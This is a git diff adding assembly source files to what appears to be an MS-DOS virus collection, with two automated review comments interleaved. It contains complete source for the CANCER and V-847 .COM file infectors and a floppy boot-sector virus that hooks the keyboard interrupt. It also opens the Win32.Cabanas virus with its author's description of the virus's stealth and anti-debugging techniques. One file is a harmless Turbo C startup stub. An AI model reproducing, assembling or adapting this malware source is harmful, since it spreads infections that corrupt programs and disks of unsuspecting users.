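Review bot: MSDOS/Virus.MSDOS.Unknown.c-740b.asm in the next hunk is byte-identical to this file — both file headers carry the same blob id 8892ea8e and the visible text matches line for line — so the archive now stores the same sample twice under two names. If the "b" name is meant to record a distinct variant, the distinction is not in the content; either keep a single copy or add a one-line note in the file header stating why both are retained, e.g. `; NOTE: identical to Virus.MSDOS.Unknown.c-740.asm; kept under the name used by <SOURCE-CATALOG>`. The same point applies to the c-740b hunk that follows.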
@@ -0,0 +1,127 @@ + page ,132 + name CANCER + title Cancer - a mutation of the V-847 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 + +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start + +start: + jmp cancer + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng db virlen +n_10D db 3 ;Unused +progbeg dd ? +eof dw ? +handle dw ? + +cancer: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + 
rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + db 0 ;Unused + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-847.asm b/MSDOS/Virus.MSDOS.Unknown.c-847.asm new file mode 100644 index 00000000..7405a6e8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-847.asm 
@@ -0,0 +1,149 @@ + page ,132 + name V847 + title The V-847 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 + +timer equ 6C +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start +newid = offset ident + virlenx + 100 + +start: + jmp virus + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng dw 44F ;Unused +progbeg dd 10000h +eof dw ? +handle dw ? + +virus: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + db 3E ;Force DS: prefix + cmp [newid],'VI' ;Infected? 
+ je close ;Go find next file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + cmp [counter],5 ;If counter goes above 5, + jb progok ; the program becomes "sick" + mov ax,40 + mov ds,ax ;Get the system timer value + mov ax,word ptr ds:[timer] + push cs + pop ds ;Restore DS + and ax,1 ;At random (if timer value is odd) + jz progok ; display the funny message + mov dx,offset message + mov ah,9 ;Print string + int 21 + int 20 ;Terminate program + +message db 'Program sick error:Call doctor or ' + db 'buy PIXEL for cure description',0A,0Dh,'$' + +progok: + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + dw 0 ;Unused + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-a-d.asm b/MSDOS/Virus.MSDOS.Unknown.c-a-d.asm new file mode 100644 index 00000000..5831a947 --- /dev/null 
+++ b/MSDOS/Virus.MSDOS.Unknown.c-a-d.asm 
@@ -0,0 +1,431 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;-----------------------------------------------------------------------; +; This virus is of the ?FLOPPY ONLY? variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. 
It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. 
Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) 
+ MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... 
+ JE ACK_KEYBD ;...JUMP IF YES
+ ;
+N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
+ ;
+N09_90: POP DS ;
+ POP BX ;
+ POP AX ;
+ POPF ;
+ ;
+ DB 0EAH ;JMP F000:E987
+OLD_09 DW ? ;
+ DW 0F000H ;
+ ;
+N09_X0: JMP N09_X1 ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
+ MOV AX,0800H ;AL=0, AH=DELAY ARG
+ OUT DX,AL ;
+ CALL DELAY ;
+ MOV [ALT_CTRL],AX ;AX=0 ;
+ ;
+ MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
+ INT 10H ;
+ MOV AH,2 ;SET CURSOR POS 0,0
+ XOR DX,DX ;
+ MOV BH,DH ; PAGE 0
+ INT 10H ;
+ ;
+ MOV AH,1 ;SET CURSOR TYPE
+ MOV CX,0607H ;
+ INT 10H ;
+ ;
+ MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
+ CALL DELAY ;
+ ;
+ CLI ;
+ OUT 20H,AL ;SEND EOI TO INT CONTROLLER
+ ;
+ MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
+ MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
+ MOV SI,offset BEGIN - 128 ;
+ MOV CX,128 ;
+ CLD ;
+ REP MOVSB ;
+ ;
+ MOV DS,CX ;CX=0 ;DS=0
+ ;
+ MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
+ MOV [(19H*4)+2],CS ;
+ ;
+ MOV AX,0040H ;DS = ROM DATA AREA
+ MOV DS,AX ;
+ ;
+ MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
+ INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
+ ;
+ PUSH DS ;IF BIOS F000:E502 == 21E4...
+ MOV AX,0F000H ;
+ MOV DS,AX ;
+ CMP Word Ptr [0E502H],21E4H ;
+ POP DS ;
+ JE R_90 ;
+ INT 19H ; IF NOT...REBOOT
+ ;
+R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
+ ;
+;-----------------------------------------------------------------------;
+; REBOOT INT VECTOR ;
+;-----------------------------------------------------------------------;
+NEW_19: XOR AX,AX ;
+ ;
+ MOV DS,AX ;DS=0
+ MOV AX,[0410] ;AX=EQUIP FLAG
+ TEST AL,1 ;IF FLOPPY DRIVES ...
+ JNZ N19_20 ;...JUMP
+N19_10: PUSH CS ;ELSE ES=CS
+ POP ES ;
+ CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ INT 18H ;LOAD BASIC
+ ;
+N19_20: MOV CX,0004 ;RETRY COUNT = 4
+ ;
+N19_22: PUSH CX ;
+ MOV AH,00 ;RESET DISK
+ INT 13 ;
+ JB N19_81 ;
+ MOV AX,0201 ;READ BOOT SECTOR
+ PUSH DS ;
+ POP ES ;
+ MOV BX,offset BEGIN ;
+ MOV CX,1 ;TRACK 0, SECTOR 1
+ INT 13H ;
+N19_81: POP CX ;
+ JNB N19_90 ;
+ LOOP N19_22 ;
+ JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
+ ;
+;-----------------------------------------------------------------------;
+; Reinfection segment. ;
+;-----------------------------------------------------------------------;
+N19_90: CMP DI,3456 ;IF NOT FLAG SET...
+ JNZ RE_INFECT ;...RE INFECT
+ ;
+JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
+ JMP 0000:7C00H ;
+ ;
+;-----------------------------------------------------------------------;
+; Reinfection Segment. ;
+;-----------------------------------------------------------------------;
+RE_INFECT: ;
+ MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
+ MOV CX,00E6H ; OURSELF
+ MOV DI,SI ;
+ PUSH CS ;
+ POP ES ;
+ CLD ;
+ REPE CMPSB ;
+ JE RI_12 ;IF NOT EQUAL...
+ ;
+ INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
+ ;
+;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
+ MOV BX,offset TABLE ;FORMAT INFO
+ MOV DX,0000 ;DRIVE A: HEAD 0
+ MOV CH,40-1 ;TRACK 39
+ MOV AH,5 ;FORMAT
+ JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
+ ;
+; <<< NO EXECUTION PATH TO HERE >>> ;
+ JB RI_80 ;
+ ;
+;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
+RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
+ MOV BX,offset BEGIN ;TRACK 40H
+ MOV CL,8 ;SECTOR 8
+ MOV AX,0301H ;WRITE 1 SECTOR
+ INT 13H ;
+ ;
+ PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
+ POP ES ;
+ JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
+ ;
+ MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
+ MOV AX,0301 ;
+ INT 13H ;
+ JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
+ ;
+RI_12: MOV DI,3456H ;SET ?JUST INFECTED ANOTHER ONE?...
+ INT 19H ;...FLAG AND REBOOT
+ ;
+RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
+ JMP JMP_BOOT ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
+ ;
+ MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
+ MOV BX,0040H ;
+ MOV DS,BX ;
+ MOV [0072H],AX ; 0040:0072 = RESET FLAG
+ JMP N09_90 ;
+ ;
+;-----------------------------------------------------------------------;
+; DELAY ;
+; ;
+; ON ENTRY AH:CX = LOOP COUNT ;
+;-----------------------------------------------------------------------;
+DELAY: SUB CX,CX ;
+D_01: LOOP $ ;
+ SUB AH,1 ;
+ JNZ D_01 ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+A7DF4 DB 27H,00H,8,2
+
+COUNTER_1 DW 001CH
+ALT_CTRL DW 0
+A7DFC DB 27H,0,8,2
+
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands!
;
+; ;
+;****************************************************************************;
diff --git a/MSDOS/Virus.MSDOS.Unknown.c0t.asm b/MSDOS/Virus.MSDOS.Unknown.c0t.asm
new file mode 100644
index 00000000..88d72658
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.c0t.asm
@@ -0,0 +1,26 @@
+; 'Extra-Tiny' memory model startup code for Turbo C 2.0
+;
+; This makes smaller executable images from C programs, by
+; removing code to get command line arguments and the like.
+; Compile with Tiny model flag, do not use any standard I/O
+; library functions, such as puts() or int86().
+;
+; This code courtesey PC Magazine, December 26, 1989.
+; But nobody really needs to know that.
+
+
+_text segment byte public 'code'
+_text ends
+_data segment word public 'data'
+_data ends
+_bss segment word public 'bss'
+_bss ends
+
+dgroup group _text, _data, _bss
+
+_text segment
+ org 100h
+begin:
+_text ends
+
+ end begin
diff --git a/MSDOS/Virus.MSDOS.Unknown.cabanas.asm b/MSDOS/Virus.MSDOS.Unknown.cabanas.asm
new file mode 100644
index 00000000..5fdd1513
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cabanas.asm
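Review bot: The `begin:` label in the final `_text segment` block of c0t.asm carries no instructions, so execution at `org 100h` falls straight into whatever object the linker places next, and nothing in this stub clears `_bss`, sets up a stack, or terminates the program; C statics that the language promises are zero-initialised are therefore only zero if DOS happens to hand over clean memory, and a `main` that returns presumably relies on the word DOS pushes at .COM entry to land on the PSP's `INT 20h`. Those are real assumptions a reader of a minimal startup should see stated, so the header comment deserves a line such as `; ASSUMES: first linked module is the entry function; _bss is NOT zeroed; SP untouched if the entry function returns`. The stub also declares `dgroup group _text, _data, _bss` but no `assume cs:dgroup, ds:dgroup`; if that is deliberate because Tiny model collapses everything into one segment, a one-line comment saying so would prevent a future maintainer from "fixing" it. The file is a build stub rather than payload code, and the rest of the diff's context is outside this hunk.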
@@ -0,0 +1,2638 @@ +; +; 苒圹圹 苒圹圹 苒圹圹 +; Win32.Cabanas.2999 圹 圹 圹 圹 圹 圹 +; by Jacky Qwerty/29A 苘苒圻 咣圹圹 圹圹圹 +; 圹圮苘 苘苘圹 圹 圹 +; 圹圹圹 圹圹圹 圹 圹 +; +; I'm very proud to introduce the first "resident" WinNT/Win95/Win32s virus. +; Not only it's the first virus stayin resident on NT, but is also the first +; with stealth, antidebuggin and antiheuristic capabilitiez. In short wordz, +; this babe is a "per process" memory resident, size stealth virus infecting +; Portable Executable filez on every existin Win32-based system. Those who +; dont know what a "per process" resident virus is, it means a virus staying +; resident inside the host Win32 aplication's private space, monitoring file +; activity and infectin PE filez opened or accesed by such Win32 aplication. +; +; The purpose of this virus is to prove new residency techniquez that can be +; exploited from genuine Win32 infectorz, without all the trouble of writing +; especific driverz for Win95 (VxDs), and WinNT. A genuine Win32 infector is +; a virus bein able to work unmodified across all Win32 platformz available: +; Win95, WinNT and any other future platform suportin the Win32 API interfa- +; ce. So far only Win95 especific virusez have been found, not Win32 genuine +; onez. Make sure to read the complete description about Win32.Cabanas writ- +; ten by P倀er Sz攔, available at http://www.avp.ch/avpve/newexe/win32/caba- +; nas.stm. U can also read description by Igor Daniloff from Dr.Web, availa- +; ble at http://www.dials.ccas.ru/inf/cabanas.htm as well. +; +; After readin P倀er Sz攔's description about Win32.Cabanas, i realized he'd +; really made a very serious profesional work. So good that he didnt seem to +; miss any internail detail in the virus, as if he had actually writen the +; bug himself or as if he was actually me, hehe. Obviosly, none of the prior +; onez are true. But, nevertheless, i think it's worth to take his work into +; account even from the VX side of the fence. 
Really i dunno what's left for +; me to say after such description, so i will simply add my own personal co- +; mentz to P倀er's log. Erm.. btw why dont u join us? heh >8P +; +; +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; 1. Technical Description +; 哪哪哪哪哪哪哪哪哪哪哪哪 +; Win32.Cabanas is the first known 32-bit virus that works under Windows NT +; Server, Windows NT workstation, Windows 95 and Windows 3.x extended with +; Win32s sub-system. It was found in late 1997. +; +; Win32.Cabanas is a per-process memory resident, fast infecting, antidebug- +; ged, partially packed/encrypted, anti-heuristic, semi-stealth virus. The +; "Win32" prefix is not misleading, as the virus is also able to spread in +; all Win32 based systems: Windows NT, Windows 95 and Win32s. The author of +; the virus is a member of the 29A group, the same young virus writer who +; wrote the infamous CAP.A virus. +; +; +; 1.1. Running an infected PE file +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; When a Win32.Cabanas infected file is executed, the execution will start +; at the original host entry point. Surprisingly, Cabanas does not touch +; the entry point field in the Image File Header. Instead it patches the +; host program at its entry point. Five bytes at the entry point is replaced +; with a FAR JMP to the address where the original program ended. This can +; be considered as an anti-heuristic feature, as the host entry point value +; in the PE header keeps pointing inside the code section, possibly turning +; off some heuristic flags. +; +; Thus the first JMP points to the real entry point. The first function in +; Cabanas unpacks and decrypts a string table which consists of Win32 KERNEL +; API names. The unpack mechanism is simple but effective enough. Cabanas is +; also an armored virus. It uses "Structured Exception Handling" (typically +; abbreviated as "SEH") as an anti-debug trick. This prevents debugging from +; any application-level debugger, such as TD32. 
+; +; When the unpack/decryptor function is ready, the virus calls a routine to +; get the original Base Address of KERNEL32.DLL. During infection time, the +; virus searches for GetModuleHandleA and GetModuleHandleW API in the Import +; Table, respectively. When it finds them, it saves a pointer to the actual +; DWORD in the .idata list. Since the loader puts the addresses to this +; table before it executes the virus, Cabanas gets them easily. +; +; If the application does not have a GetModuleHandleA / GetModuleHandleW API +; import, the virus uses a third undocumented way to get the Base Address of +; KERNEL32.DLL by getting it from the ForwarderChain field in the KERNEL32 +; import. Actually this will not work under Windows NT, but on Win95 only. +; When the virus has the Base Address/Module Handle of KERNEL32.DLL, it +; calls its own routine to get the address of GetProcAddress function. The +; first method is based on the search of the Import Table during infection +; time. The virus saves a pointer to the .idata section whenever it finds a +; GetProcAddress import in the host. In most cases Win32 applications import +; the GetProcAddress API, thus the virus should not use a secondary routine +; to get the same result. If the first method fails, the virus calls another +; function which is able to search for GetProcAddress export in KERNEL32. +; Such function could be called as GetProcAddress-From-ExportsTable. This +; function is able to search in KERNEL32's Exports Table and find the +; address of GetProcAddress API. +; +; This function is one of the most important ones from the virus point of +; view and it is compatible with all Win32 based systems. If the entry point +; of GetProcAddress was returned by the GetProcAddress-From-ExportsTable +; function, the virus saves this address and use it later on. Otherwise, the +; GetProcAddress-From-ExportsTable function will be used several times. 
This +; function is also saved with "Structured Exception Handling" to avoid from +; possible exceptions. After this, the virus gets all the API addresses it +; wants to use in a loop. When the addresses are available, Cabanas is ready +; to replicate and call its direct action infection routine. +; +; +; 1.2. Direct action infection +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; The direct action infection part is surprisingly fast. Even though the +; virus goes through all the files in Windows directory, Windows System +; directory and in the current directory respectively, the file infection +; is fast enough to go unnoticed in much systems. This is because the virus +; works with "memory mapped files", a new feature implemented in Win32 based +; systems which simplifies file handling and increases system performance. +; +; First the virus gets the name of Windows directory, then it gets the name +; of Windows System directory and calls the function which searches for non- +; infected executable images. It searches for non directory entries and +; check the size of the files it found. +; +; Files with size dividable by 101 without reminder are assumed to be +; infected. Other files which are too huge will not be infected either. +; After this, the virus checks the file extension, if it matches EXE or +; SCR (screen saver files), the virus opens and maps the file. If the file +; is considered too short, the file is closed. Then it checks the`MZ' marker +; at the beginning of the image. Next it positions to the possible `PE' +; header area and checks the `PE' signature. It also checks that the +; executable was made to run on 386+ machines and looks for the type of +; the file. DLL files are not infected. +; +; After this, the virus calculates a special checksum which uses the +; checksum field of PE files Optional Header and the file-stamp field of +; the Image File Header. If the file seems to be infected the virus closes +; the file. If not, the file is chosen for infection. 
